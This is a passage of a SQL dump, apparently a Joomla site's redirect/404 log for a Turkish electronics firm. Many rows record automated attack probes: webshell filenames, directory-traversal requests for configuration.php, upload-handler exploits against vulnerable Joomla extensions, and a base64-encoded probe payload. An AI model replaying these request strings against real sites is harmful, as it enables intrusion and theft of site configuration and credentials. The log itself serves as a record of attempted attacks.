00:00:00',301),(22158,'http://3s-technologies.com.tr/tr/cpanel.php',NULL,'','',11,0,'2019-03-08 05:08:04','0000-00-00 00:00:00',301),(22159,'http://3s-technologies.com.tr/tr/cp.php',NULL,'','',17,0,'2019-03-08 05:08:08','0000-00-00 00:00:00',301),(22160,'http://3s-technologies.com.tr/tr/root.php',NULL,'','',82,0,'2019-03-08 05:08:11','0000-00-00 00:00:00',301),(22161,'http://3s-technologies.com.tr/tr/1337w0rm.php',NULL,'','',11,0,'2019-03-08 05:08:13','0000-00-00 00:00:00',301),(22162,'http://3s-technologies.com.tr/tr/2019.php',NULL,'','',11,0,'2019-03-08 05:08:16','0000-00-00 00:00:00',301),(22163,'http://3s-technologies.com.tr/tr/images/stories/cmd.php',NULL,'','',3,0,'2019-03-08 05:08:52','0000-00-00 00:00:00',301),(22164,'http://3s-technologies.com.tr/tr/templates/beez_3/index.php',NULL,'','',9,0,'2019-03-08 05:09:26','0000-00-00 00:00:00',301),(22165,'http://3s-technologies.com.tr/tr/uploads',NULL,'','',90,0,'2019-03-08 05:10:58','0000-00-00 00:00:00',301),(22166,'http://3s-technologies.com.tr/tr/img',NULL,'','',21,0,'2019-03-08 05:11:02','0000-00-00 00:00:00',301),(22167,'http://3s-technologies.com.tr/tr/upload',NULL,'','',66,0,'2019-03-08 05:11:05','0000-00-00 00:00:00',301),(22168,'http://3s-technologies.com.tr/tr/gallery',NULL,'','',15,0,'2019-03-08 05:11:08','0000-00-00 00:00:00',301),(22169,'http://3s-technologies.com.tr/tr/files',NULL,'','',46,0,'2019-03-08 05:11:11','0000-00-00 00:00:00',301),(22170,'http://3s-technologies.com.tr/tr/pdf',NULL,'','',11,0,'2019-03-08 05:11:14','0000-00-00 00:00:00',301),(22171,'http://3s-technologies.com.tr/tr/docs',NULL,'','',11,0,'2019-03-08 05:11:17','0000-00-00 00:00:00',301),(22172,'http://www.3s-technologies.com.tr/tr/zgrinjhrxzf.html',NULL,'','',1,0,'2019-03-08 08:28:08','0000-00-00 00:00:00',301),(22173,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,1-10',NULL,'','',1,0,'2019-03-10 02:45:37','0000-00-00 00:00:00',301),(22174,'https://www.3s-technologies.com.tr/tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'','',2,0,'2019-03-11 19:54:14','0000-00-00 00:00:00',301),(22175,'http://3s-technologies.com.tr/tr/apple-touch-icon.png',NULL,'','',8,0,'2019-03-12 20:00:42','0000-00-00 00:00:00',301),(22176,'http://3s-technologies.com.tr/tr/apple-touch-icon-precomposed.png',NULL,'','',8,0,'2019-03-12 20:00:43','0000-00-00 00:00:00',301),(22177,'http://www.3s-technologies.com.tr/tr/?r?nler/manufacturer/mirae/smd-ultra-h?z?keyword&language=tr-tr',NULL,'','',1,0,'2019-03-13 10:51:13','0000-00-00 00:00:00',301),(22178,'http://www.3s-technologies.com.tr/tr/?r?nler/smd-d???k-h?zl??keyword&language=tr-tr',NULL,'','',1,0,'2019-03-13 10:53:08','0000-00-00 00:00:00',301),(22179,'http://www.3s-technologies.com.tr/tr/?r?nler/manufacturer/ddm-novastar/screen-printer/by,mf_name?keyword&language=tr-tr',NULL,'','',1,0,'2019-03-13 10:57:26','0000-00-00 00:00:00',301),(22180,'http://www.3s-technologies.com.tr/tr/?r?nler/b?lgesel-lehimleme/by,category_name?keyword&language=tr-tr',NULL,'','',1,0,'2019-03-13 11:02:00','0000-00-00 00:00:00',301),(22181,'http://3s-technologies.com.tr/tr/media/mah.txt',NULL,'','',1,0,'2019-03-13 12:20:16','0000-00-00 00:00:00',301),(22182,'http://3s-technologies.com.tr/tr/images/mah.gif',NULL,'','',1,0,'2019-03-13 12:20:19','0000-00-00 00:00:00',301),(22183,'http://3s-technologies.com.tr/tr/images/grav.jpg',NULL,'','',1,0,'2019-03-14 03:43:48','0000-00-00 00:00:00',301),(22184,'https://www.3s-technologies.com.tr/en/admin/images/cal_date_over.gif',NULL,'','',2,0,'2019-03-14 14:33:50','0000-00-00 00:00:00',301),(22185,'https://www.3s-technologies.com.tr/en/admin/login.php',NULL,'','',2,0,'2019-03-14 14:34:00','0000-00-00 00:00:00',301),(22186,'https://www.3s-technologies.com.tr/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',7,0,'2019-03-14 14:34:41','0000-00-00 00:00:00',301),(22187,'https://www.3s-technologies.com.tr/en/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',2,0,'2019-03-14 14:34:47','0000-00-00 00:00:00',301),(22188,'https://www.3s-technologies.com.tr/en/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',2,0,'2019-03-14 14:34:54','0000-00-00 00:00:00',301),(22189,'https://www.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',2,0,'2019-03-14 14:34:59','0000-00-00 00:00:00',301),(22190,'https://www.3s-technologies.com.tr/en/media/vuln.txt',NULL,'','',2,0,'2019-03-14 14:35:06','0000-00-00 00:00:00',301),(22191,'https://www.3s-technologies.com.tr/en/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',2,0,'2019-03-14 14:35:09','0000-00-00 00:00:00',301),(22192,'https://www.3s-technologies.com.tr/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',8,0,'2019-03-14 14:35:14','0000-00-00 00:00:00',301),(22193,'https://www.3s-technologies.com.tr/en/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',2,0,'2019-03-14 14:35:30','0000-00-00 00:00:00',301),(22194,'https://www.3s-technologies.com.tr/index.php?option=com_myblog&task=ajaxupload',NULL,'','',2,0,'2019-03-14 14:35:34','0000-00-00 00:00:00',301),(22195,'https://www.3s-technologies.com.tr/en/images/pwn.gif',NULL,'','',2,0,'2019-03-14 14:35:39','0000-00-00 00:00:00',301),(22196,'https://www.3s-technologies.com.tr/en/?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',2,0,'2019-03-14 14:35:43','0000-00-00 00:00:00',301),(22197,'https://www.3s-technologies.com.tr/en/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',2,0,'2019-03-14 14:35:58','0000-00-00 00:00:00',301),(22198,'https://www.3s-technologies.com.tr/en/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',2,0,'2019-03-14 14:36:01','0000-00-00 00:00:00',301),(22199,'https://www.3s-technologies.com.tr/en/components/com_sexycontactform/fileupload',NULL,'','',2,0,'2019-03-14 14:36:06','0000-00-00 00:00:00',301),(22200,'https://www.3s-technologies.com.tr/en/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',2,0,'2019-03-14 14:36:11','0000-00-00 00:00:00',301),(22201,'https://www.3s-technologies.com.tr/en/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',2,0,'2019-03-14 14:36:16','0000-00-00 00:00:00',301),(22202,'https://www.3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',2,0,'2019-03-14 14:36:27','0000-00-00 00:00:00',301),(22203,'https://www.3s-technologies.com.tr/en/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',2,0,'2019-03-14 14:36:32','0000-00-00 00:00:00',301),(22204,'http://www.3s-technologies.com.tr/tr/urunler/smd-fä±rä±n',NULL,'','',1,0,'2019-03-14 19:14:36','0000-00-00 00:00:00',301),(22205,'http://3s-technologies.com.tr/tr/customer/account/create/',NULL,'','',545,0,'2019-03-16 00:21:09','0000-00-00 00:00:00',301),(22206,'http://3s-technologies.com.tr/tr/.well-known/security.txt',NULL,'','',7,0,'2019-03-16 06:05:29','0000-00-00 00:00:00',301),(22207,'http://www.3s-technologies.com.tr/tr/mhfxffzwvp.html',NULL,'','',1,0,'2019-03-16 10:58:31','0000-00-00 00:00:00',301),(22208,'http://3s-technologies.com.tr/en/favicon.ico',NULL,'http://3s-technologies.com.tr/favicon.ico','',3,0,'2019-03-17 08:21:59','0000-00-00 00:00:00',301),(22209,'http://3s-technologies.com.tr/tr/rocwvejvfzlo.html',NULL,'','',1,0,'2019-03-18 12:26:27','0000-00-00 00:00:00',301),(22210,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/search-component/tr/',NULL,'http://3s-technologies.com.tr/tr/','',2,0,'2019-03-19 01:25:01','0000-00-00 00:00:00',301),(22211,'http://3s-technologies.com.tr/modules/mod_artuploader/upload.php',NULL,'','',2,0,'2019-03-19 06:42:26','0000-00-00 00:00:00',301),(22212,'http://3s-technologies.com.tr/tr/modules/mod_artuploader/jsspwned.php?jsspwned=bwfpbcgicnvzlmf0dgfjy0bnbwfpbc5jb20ilcaisxrzig5vdcbhym91dcb0agugbw9uzxkilcakx1nfulzfulsiu0vsvkvsx05btuuixsauicrfu0vsvkvswyjsrvfvrvnux1vsssjdlcairnjvbtogc29ycnlub3rzb3jyeubtywlslmnvbsipoybly2hvigjhc2u2nf9kzwnvzguoimnizhvav1jxyznnpsipow==',NULL,'','',2,0,'2019-03-19 06:42:28','0000-00-00 00:00:00',301),(22213,'http://3s-technologies.com.tr/tr/media/jsspwned.php?jsspwned=bwfpbcgicnvzlmf0dgfjy0bnbwfpbc5jb20ilcaisxrzig5vdcbhym91dcb0agugbw9uzxkilcakx1nfulzfulsiu0vsvkvsx05btuuixsauicrfu0vsvkvswyjsrvfvrvnux1vsssjdlcairnjvbtogc29ycnlub3rzb3jyeubtywlslmnvbsipoybly2hvigjhc2u2nf9kzwnvzguoimnizhvav1jxyznnpsipow==',NULL,'','',2,0,'2019-03-19 06:42:30','0000-00-00 00:00:00',301),(22214,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form|time=11|not_spammed|traffic=112344|comments=0',NULL,'','',20,0,'2019-03-20 13:34:38','0000-00-00 00:00:00',301),(22215,'http://3s-technologies.com.tr/en/?option=com_fireboard',NULL,'','',1,0,'2019-03-20 19:18:08','0000-00-00 00:00:00',301),(22216,'http://3s-technologies.com.tr/en/?option=com_easyblog',NULL,'','',1,0,'2019-03-21 04:46:02','0000-00-00 00:00:00',301),(22217,'http://3s-technologies.com.tr/en/components/com_b2jcontact/dlc.php',NULL,'','',1,0,'2019-03-21 12:05:15','0000-00-00 00:00:00',301),(22218,'http://3s-technologies.com.tr/en/?option=com_easydiscuss',NULL,'','',1,0,'2019-03-21 16:30:05','0000-00-00 00:00:00',301),(22219,'http://3s-technologies.com.tr/tr/bigdump/bigdump.php',NULL,'','',2,0,'2019-03-21 19:33:20','0000-00-00 00:00:00',301),(22220,'http://3s-technologies.com.tr/tr/dump/bigdump.php',NULL,'','',2,0,'2019-03-21 19:33:21','0000-00-00 00:00:00',301),(22221,'http://3s-technologies.com.tr/tr/big/bigdump.php',NULL,'','',1,0,'2019-03-21 19:33:23','0000-00-00 00:00:00',301),(22222,'http://3s-technologies.com.tr/tr/bigdump.php',NULL,'','',3,0,'2019-03-21 19:33:24','0000-00-00 00:00:00',301),(22223,'http://3s-technologies.com.tr/tr/big.php',NULL,'','',1,0,'2019-03-21 19:33:26','0000-00-00 00:00:00',301),(22224,'http://3s-technologies.com.tr/tr/dump.php',NULL,'','',3,0,'2019-03-21 19:33:27','0000-00-00 00:00:00',301),(22225,'http://3s-technologies.com.tr/tr/bd.php',NULL,'','',2,0,'2019-03-21 19:33:30','0000-00-00 00:00:00',301),(22226,'http://3s-technologies.com.tr/tr/sql/bigdump.php',NULL,'','',2,0,'2019-03-21 19:33:31','0000-00-00 00:00:00',301),(22227,'http://3s-technologies.com.tr/tr/bigdump1.php',NULL,'','',1,0,'2019-03-21 19:33:33','0000-00-00 00:00:00',301),(22228,'http://3s-technologies.com.tr/tr/b/bigdump.php',NULL,'','',1,0,'2019-03-21 19:33:34','0000-00-00 00:00:00',301),(22229,'http://3s-technologies.com.tr/tr/mysql/bigdump.php',NULL,'','',1,0,'2019-03-21 19:33:36','0000-00-00 00:00:00',301),(22230,'http://3s-technologies.com.tr/tr/bdump.php',NULL,'','',1,0,'2019-03-21 19:33:37','0000-00-00 00:00:00',301),(22231,'http://3s-technologies.com.tr/tr/wordpress',NULL,'','',1208,0,'2019-03-22 06:10:21','0000-00-00 00:00:00',301),(22232,'http://3s-technologies.com.tr/tr/wp',NULL,'','',833,0,'2019-03-22 06:10:26','0000-00-00 00:00:00',301),(22233,'http://3s-technologies.com.tr/tr/blog',NULL,'','',166,0,'2019-03-22 06:10:31','0000-00-00 00:00:00',301),(22234,'http://3s-technologies.com.tr/tr/new',NULL,'','',805,0,'2019-03-22 06:10:32','0000-00-00 00:00:00',301),(22235,'http://3s-technologies.com.tr/tr/old',NULL,'','',835,0,'2019-03-22 06:10:32','0000-00-00 00:00:00',301),(22236,'http://3s-technologies.com.tr/tr/test',NULL,'','',149,0,'2019-03-22 06:10:35','0000-00-00 00:00:00',301),(22237,'http://3s-technologies.com.tr/tr/main',NULL,'','',700,0,'2019-03-22 06:10:37','0000-00-00 00:00:00',301),(22238,'http://3s-technologies.com.tr/tr/site',NULL,'','',131,0,'2019-03-22 06:10:40','0000-00-00 00:00:00',301),(22239,'http://3s-technologies.com.tr/tr/backup',NULL,'','',811,0,'2019-03-22 06:10:42','0000-00-00 00:00:00',301),(22240,'http://3s-technologies.com.tr/tr/demo',NULL,'','',46,0,'2019-03-22 06:10:45','0000-00-00 00:00:00',301),(22241,'http://3s-technologies.com.tr/tr/home',NULL,'','',675,0,'2019-03-22 06:10:45','0000-00-00 00:00:00',301),(22242,'http://3s-technologies.com.tr/tr/cms',NULL,'','',27,0,'2019-03-22 06:10:48','0000-00-00 00:00:00',301),(22243,'http://3s-technologies.com.tr/tr/dev',NULL,'','',16,0,'2019-03-22 06:10:49','0000-00-00 00:00:00',301),(22244,'http://3s-technologies.com.tr/tr/portal',NULL,'','',11,0,'2019-03-22 06:10:50','0000-00-00 00:00:00',301),(22245,'http://3s-technologies.com.tr/tr/web',NULL,'','',24,0,'2019-03-22 06:10:51','0000-00-00 00:00:00',301),(22246,'http://3s-technologies.com.tr/tr/temp',NULL,'','',43,0,'2019-03-22 06:10:53','0000-00-00 00:00:00',301),(22247,'http://www.3s-technologies.com.tr/en/wp-content/themes/dance-studio/core/libs',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/dance-studio/core/libs/','',1,0,'2019-03-22 14:22:11','0000-00-00 00:00:00',301),(22248,'http://www.3s-technologies.com.tr/tr/bpfmuenb.html',NULL,'','',1,0,'2019-03-23 20:42:04','0000-00-00 00:00:00',301),(22249,'http://3s-technologies.com.tr/tr/elfinder/php/connector.minimal.php',NULL,'','',22,0,'2019-03-24 10:13:22','0000-00-00 00:00:00',301),(22250,'http://www.3s-technologies.com.tr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../izoc.php',NULL,'','',2,0,'2019-03-24 15:26:33','0000-00-00 00:00:00',301),(22251,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact/uploads/izoc.php',NULL,'','',2,0,'2019-03-24 15:26:35','0000-00-00 00:00:00',301),(22252,'http://www.3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/xattacker.php?x=attacker',NULL,'','',2,0,'2019-03-24 15:26:52','0000-00-00 00:00:00',301),(22253,'http://www.3s-technologies.com.tr//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',2,0,'2019-03-24 15:26:58','0000-00-00 00:00:00',301),(22254,'http://www.3s-technologies.com.tr//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',2,0,'2019-03-24 15:26:59','0000-00-00 00:00:00',301),(22255,'http://www.3s-technologies.com.tr//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',2,0,'2019-03-24 15:27:01','0000-00-00 00:00:00',301),(22256,'http://www.3s-technologies.com.tr//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',2,0,'2019-03-24 15:27:02','0000-00-00 00:00:00',301),(22257,'http://www.3s-technologies.com.tr//administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',2,0,'2019-03-24 15:27:03','0000-00-00 00:00:00',301),(22258,'http://www.3s-technologies.com.tr//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',2,0,'2019-03-24 15:27:05','0000-00-00 00:00:00',301),(22259,'http://www.3s-technologies.com.tr//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=xxb.php',NULL,'','',2,0,'2019-03-24 15:27:06','0000-00-00 00:00:00',301),(22260,'http://3s-technologies.com.tr/tr/vdojxqqyvn.html',NULL,'','',1,0,'2019-03-25 20:45:46','0000-00-00 00:00:00',301),(22261,'http://www.3s-technologies.com.tr/tr/webconfig.txt.php',NULL,'http://www.google.com.hk','',12,0,'2019-03-26 11:17:38','0000-00-00 00:00:00',301),(22262,'http://www.3s-technologies.com.tr/tr/administrator/webconfig.txt.php',NULL,'http://www.google.com.hk','',6,0,'2019-03-26 11:17:55','0000-00-00 00:00:00',301),(22263,'https://www.3s-technologies.com.tr/tr/webconfig.txt.php',NULL,'http://www.google.com.hk','',12,0,'2019-03-26 11:18:33','0000-00-00 00:00:00',301),(22264,'https://www.3s-technologies.com.tr/tr/administrator/webconfig.txt.php',NULL,'http://www.google.com.hk','',6,0,'2019-03-26 11:18:52','0000-00-00 00:00:00',301),(22265,'http://3s-technologies.com.tr/tr//index.php/component/users/?view=login',NULL,'','',3,0,'2019-03-26 12:53:36','0000-00-00 00:00:00',301),(22266,'http://3s-technologies.com.tr/tr/mysqladmin/',NULL,'','',2,0,'2019-03-27 06:57:11','0000-00-00 00:00:00',301),(22267,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-27 12:58:14','0000-00-00 00:00:00',301),(22268,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 12:58:14','0000-00-00 00:00:00',301),(22269,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 12:58:15','0000-00-00 00:00:00',301),(22270,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-27 12:58:16','0000-00-00 00:00:00',301),(22271,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:16','0000-00-00 00:00:00',301),(22272,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:16','0000-00-00 00:00:00',301),(22273,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:17','0000-00-00 00:00:00',301),(22274,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:17','0000-00-00 00:00:00',301),(22275,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:17','0000-00-00 00:00:00',301),(22276,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:18','0000-00-00 00:00:00',301),(22277,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:18','0000-00-00 00:00:00',301),(22278,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:18','0000-00-00 00:00:00',301),(22279,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:19','0000-00-00 00:00:00',301),(22280,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:19','0000-00-00 00:00:00',301),(22281,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:19','0000-00-00 00:00:00',301),(22282,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 12:58:19','0000-00-00 00:00:00',301),(22283,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-27 12:58:20','0000-00-00 00:00:00',301),(22284,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-27 12:58:20','0000-00-00 00:00:00',301),(22285,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-27 12:58:22','0000-00-00 00:00:00',301),(22286,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-27 12:58:22','0000-00-00 00:00:00',301),(22287,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-27 12:58:22','0000-00-00 00:00:00',301),(22288,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjewoxhoklhahxls4skhzbsatc4fbawciscmd0&amp;usg=aovvaw2dfvwpfa08xoww2phefblp//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-27 12:58:23','0000-00-00 00:00:00',301),(22289,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',2,0,'2019-03-27 12:58:24','0000-00-00 00:00:00',301),(22290,'http://proneo-led.com/3s-technologies.com.tr/joomla//components/com_creativecontactform/fileupload/index.php',NULL,'','',2,0,'2019-03-27 12:58:25','0000-00-00 00:00:00',301),(22291,'http://proneo-led.com/3s-technologies.com.tr/joomla//components/com_sexycontactform/fileupload/index.php',NULL,'','',2,0,'2019-03-27 12:58:26','0000-00-00 00:00:00',301),(22292,'http://proneo-led.com/3s-technologies.com.tr/joomla//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:26','0000-00-00 00:00:00',301),(22293,'http://proneo-led.com/3s-technologies.com.tr/joomla//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:27','0000-00-00 